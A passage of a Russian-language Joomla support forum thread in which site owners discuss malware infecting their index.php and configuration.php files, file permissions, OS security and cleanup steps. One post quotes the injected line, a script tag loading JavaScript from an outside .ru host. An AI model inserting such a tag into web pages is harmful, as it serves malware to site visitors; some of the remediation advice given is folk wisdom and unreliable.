SOS!Не могу зайти на сайт! - страница 2 - Joomla 1.5: Настройка и оптимизация

Поищите через Total Commander во всех файлах или вручную через поиск Правка-Найти.

Попробуйте 775

С такими правами тоже недоступны на запись:(
А если оставить 777, то чем это чревато?

С такими правами тоже недоступны на запись:(
А если оставить 777, то чем это чревато?

У техподдержки спросите как работает Ваш сервер или сделайте и посмотрите файл phpinfo.php. Может без прав 0777 на папки Вам вообще не обойтись.

А вы дальше Windows используйте, привыкните... и не будете замечать

А что, они только в Windows лезут?

сайты на моем аккаунте продолжают заражаться...причем, как версии 1.х.х, так и 1.5.х
Всем рекомендую поставить 555 на файл index.php

А что, они только в Windows лезут?

Вирусом само больше на ту ось которая имеет самое большее распространение.
На мак леопард тоже ловил. Не так много но бывало. А вообще не ставте стремное и поменьше лазте по подозрительным сатам и вирусов меньше будет.
в 99% случаев сам пользователь виноват что нахватался болячек.

А вообще не ставте стремное и поменьше лазте по подозрительным сатам и вирусов меньше будет.
в 99% случаев сам пользователь виноват что нахватался болячек.

Ага и завернитесь простыней , а комп поставьте в бронированный ящик на замок. И в инет ни-ни, там же вирусы:)))

А кто говорит о простыне...
Ну если вам так интересно ловить вирусню, то.... по чаще по порнушным сатам ползайте, ставте хаки на саты и т.д.
А потом кричите на форуме - какого вирусы лезут.

А что, они только в Windows лезут?

Посмотрите информацию о вирусах под Linux и стравните с энциклопедией вирусов под Windows/// Кстати еще нужно умудриться запустить вирус под Linux-ом, Если конечно из-под root пользователя. Хотя если хотите, то и антивирусник можете и на рабочую станцию Linux-машины установить.

Ага и завернитесь простыней , а комп поставьте в бронированный ящик на замок. И в инет ни-ни, там же вирусы:)))

Одеялом можно и не укутываться. А расширить кругозор по ОС и дистрибутивам.

А кто говорит о простыне...
Ну если вам так интересно ловить вирусню, то.... по чаще по порнушным сатам ползайте, ставте хаки на саты и т.д.
А потом кричите на форуме - какого вирусы лезут.

Улыбнули :)Это что ж, по-вашему, здесь все озабоченные собрались?
"Наползались" по порнушным сайтам - и на форум, помощи просить?
Как это не странно, но вирусня (как Вы ее называете) обитает не только на таких сайтах, а может вылезти откуда угодно и от этого никто не застрахован, даже Вы.
 

сайты на моем аккаунте продолжают заражаться...причем, как версии 1.х.х, так и 1.5.х
Всем рекомендую поставить 555 на файл index.php

А разве на файлы не 644 надо ставить?

А разве на файлы не 644 надо ставить?

На конфиг можете и меньше...

Посмотрите информацию о вирусах под Linux и стравните с энциклопедией вирусов под Windows/// Кстати еще нужно умудриться запустить вирус под Linux-ом, Если конечно из-под root пользователя. Хотя если хотите, то и антивирусник можете и на рабочую станцию Linux-машины установить.

Согласна, Linux в этом отношении безопаснее и лучше, но он ведь и мощнее - не к любому компу подойдет...

Согласна, Linux в этом отношении безопаснее и лучше, но он ведь и мощнее - не к любому компу подойдет...

Кто Вам такую глупость сказал насчет выделенного...
Запустите XP и linux на 128Mb оперативки и сравните...

Просто железо нужно брать, которое поддерживается определенным дистрибутивом... Я пользуюсь убунту еще с 6-ой версии и доволен... Ранее многое перепробывал... Один ПК, как говорят, уже бы и выкинуть, а зачем выбрасывать, если работает... На ноутбуке тоже убунту...

Один знакомый IT-шник
Но если поставить права 555 на index.php, он ведь и для владельца сайта станет недоступен на запись?

Один знакомый IT-шник
Но если поставить права 555 на index.php, он ведь и для владельца сайта станет недоступен на запись?

Вы же имеете доступ по ФТП, в любое время зайдите и поменяйте права на нужный файл, подредактируйте и смените права обратно... Например для конфигурационного файла или для params.ini в шаблоне иногда требуется сменить. А в основном на файлы права 0644

Один знакомый IT-шник
Но если поставить права 555 на index.php, он ведь и для владельца сайта станет недоступен на запись?

А зачем вам в нем писать что то? Вообще поставте 444. Это не тот файл в котором вам что то нужно изменять. А если и нужно то не долго дать такие права. Еще и на configuration.php можно 444 влупить, не помешает. Тем более что именно в нем лежат данные по базе.

огласна, Linux в этом отношении безопаснее и лучше, но он ведь и мощнее - не к любому компу подойдет...

все зависит от сборки и версии. Есть и линухи прожорливые а есть и с карькуляторными требованиями. Но в целом линуха намного меньше требует мощностей чем виндовс. А вот в плане удобства там не все гуд. Все сделано в плане защищенности. А середины не бывает. Хотите защиту получайте запуск с правами, но и самому придется постоянно эти же права доказывать оси.

Улыбнули Это что ж, по-вашему, здесь все озабоченные собрались?
"Наползались" по порнушным сайтам - и на форум, помощи просить?
Как это не странно, но вирусня (как Вы ее называете) обитает не только на таких сайтах, а может вылезти откуда угодно и от этого никто не застрахован, даже Вы.

Вы не уловили саму суть а вцепились в сами слова. Порно не обязательно, можно и на варезнике словить вирус или еще где нибудь. Просто осторожнее нужно быть. 100% панацеи нет ни у кого и нигде. Но если есть возможность избегать подозрительные сайты, источники, программы варезные и т.п. то лучше их избегать.
В моей практике было много случаев когда у людей были ддосы как раз по причине установки какого то хака (в который умные люди смогли запихнуть вреденосный код) а потом кричать что Joomla как полная и что сломать ее не составит труда. А когда человеку объясняешь что он сам вирус пригласил себе же на сайт, то смотрят как на дурака.

Бодрого времени суток!
У меня аналогичная ситуация:

90-я строка
<script type="text/javascript" src="http://riotassistance.ru/Kerning.js"></script>
<!--37d19c7c554b7f931a05546aeafd10fe-->

Удалил. Заработало. Обновился. Сейчас отпишу в поддержку.
Не подскажете, где еще, кроме как в index.php, может вылезти данная "зараза"?
Заранее благодарен.

та же проблема была.
у вас вирус на компе. лечим следующим образом:
1. удаляем все браузеры и все куки к ним (даже экполер)
2. после удаления перезагружаешь комп
3. CCleaner - скачиваешь эту прогу. чистишь реестр и временные файлы (бесплатная прога)
4. Антивирем проверяешь комп
5. Spybot - Search & Destroy - ее скачиваешь (она бесплатная) и ставишь и проверяешь на шпионов
6. После полной проверки перезагружаешь комп
7. Далее заходишь в админку: меняешь пассы на фтп - в личный кабинет - к root (если есть)
8. Скачиваешь файлы с сайта на комп и начинаешь блокнотом открывать все файлы типа имя..js. Удаляешь там везде эту строчку. заменяешь файлы отредактированные на старые. (как вариант если пишет бакуп то можешь за число когда этого не было восстановить файлы).
вауаля)
вир сидит в браузере - однозначно и проверено.
если чо пиши.

etot5user спасибо за подробный ответ.
сейчас буду проводить полный курс "лечения"  


Эта зараза сидела во всех index.php, configuration.php, везде, где есть слово default.
Лечить - дело хлопотное, поэтому решил проблему восстановлением из бэкапа, предварительно почистив комп всеми возможными способами.
Всем спасибо за участие в решении моей проблемы...   

Не подскажете, где еще, кроме как в index.php, может вылезти данная "зараза"?

У меня во всех файлах index.html эта зараза

залей сайт на компьютер и открой все файлы в редакторе. Удали все от туда вредное одним махом. Потом назад залей на хостинг.

Посмотрите информацию о вирусах под Linux и стравните с энциклопедией вирусов под Windows/// Кстати еще нужно умудриться запустить вирус под Linux-ом, Если конечно из-под root пользователя.

согласен на 100%

Хм... Выкрутился сам. Но...
У меня та же хрень возникла. Ну, думаю, посмотрю index, качаю... Нод32 лицензия тут же пропищал, мол троян, и грохнул index (скрин ниже). Перезалил индекс и все заработало. Потом решил просмотреть еще 2 моих сайта на джомле... На обоих та же хрень. Вылечил тем же способом. НО! эта хрень во всех index.php. Это хреново.... Очень много работы ручками.
Самое хреновое: я на сайты последний раз залазил недели 2 назад.

Так.... У меня сейчас движок 1.5.15. Уже вышел 1.5.20. Если обновлюсь, положение изменится? Не шибко радует перелопачивать все index.php.

Так.... У меня сейчас движок 1.5.15. Уже вышел 1.5.20. Если обновлюсь, положение изменится? Не шибко радует перелопачивать все index.php.

навряд ли чего-то измениться.

Перелейте поверх баз данных Joomla и компоненты (и прочее там что есть), сохранив пользовательские файлы. Не забудьте проверить ПК AVPToll и найти уязвимость через которую взломали. Все с вирусняком удалите. Перед всеми работами сделайте бекап - мало ли что.

Перелейте поверх баз данных Joomla и компоненты (и прочее там что есть)

Извините, не понял. Поверх баз данных что перелить? База данных - это msql? Но бекапа не испорченного, к сожалению, нет. Был бы....
Или Вы предлагаете обновится таки?

навряд ли чего-то измениться.

Почему? Ведь заражены в основном index. Когда сливаю на комп сайт, у меня нод32 ругается только на индексы. В одном из сайтов насчитал 15 штук... Засада.... Что же делать-то? Реально все индексы переписывать не улыбается, тем более я уже и не помню какие из них переделывал.

Joomla+ все компоненты и прочее. Так точно вы избавитесь от вируса. Поверх mysql. Именно потому что нет бекапа. Перед этим его сделать (про всякий случай) и сохранить пользовательские файлы (которые потом вернуть на места без страниц содержащих index). Если не уверены в своих силах, пусть вам кто нибудь поможет.

Такая зараза очень любит Joomla (не все этому комбайнеру защиту обеспечить могут), любит нагадить в index файлы, так что первым делом смотреть нужно именно их. Еще у таких пакостей есть жгучий интерес к (стандартным) папкам вроде cgi-bin, так что туда тоже поглядывайте на предмет ништяков.

За последние 2 недели ко мне с просьбами "почистить сайт от вирусов" обратились 8 человек. Заметьте, у всех Joomla 

Но что же делать, на другой движок переходить?!
Есть какой-нибудь реально действенный способ обезопасить свой сайт от этой заразы?
Обновление, права на папки, бэкапы, не ходить на порно- и подозрительные сайты, чистить комп, переустановить систему - это все или есть что-то еще?
А вообще, может она проникнуть по ФТП с другого компа, если на нем хранится мой пароль?